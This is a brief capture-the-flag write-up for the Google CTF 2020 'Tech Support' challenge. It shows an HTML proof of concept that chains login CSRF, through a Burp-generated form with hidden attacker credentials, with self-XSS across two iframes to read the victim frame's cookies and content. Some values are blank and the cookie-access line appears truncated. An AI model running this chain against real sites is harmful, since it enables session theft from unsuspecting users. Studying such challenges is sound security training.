Google CTF 2020 – Tech Support (Trick Abuse Self XSS, CSRF login, improper session management)

Require: Self XSS, CSRF login, When valid session on new tab, no script relogin.


<iframe src="" id="first"></iframe>
<iframe srcdoc='<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState("", "", "/")</script>
    <form action="" method="POST" id="formlogin">
      <input type="hidden" name="username" value="lala" />
      <input type="hidden" name="password" value="lala@123" />
      <input type="hidden" name="csrf" value="" />
      <input type="submit" value="Submit request" />
' id="second"></iframe>

<!-- self XSS:

1. Create Iframe 1 have Target Victim session on
2. Create Iframe 2 have CSRF login as attacker –)) attacker session on
3. Abuse SOP of Iframe 1 and Iframe 2, from self XSS in Iframe 2 –)) read data from Iframe 1 (include cookie, content, …) by using:[0].document.cookie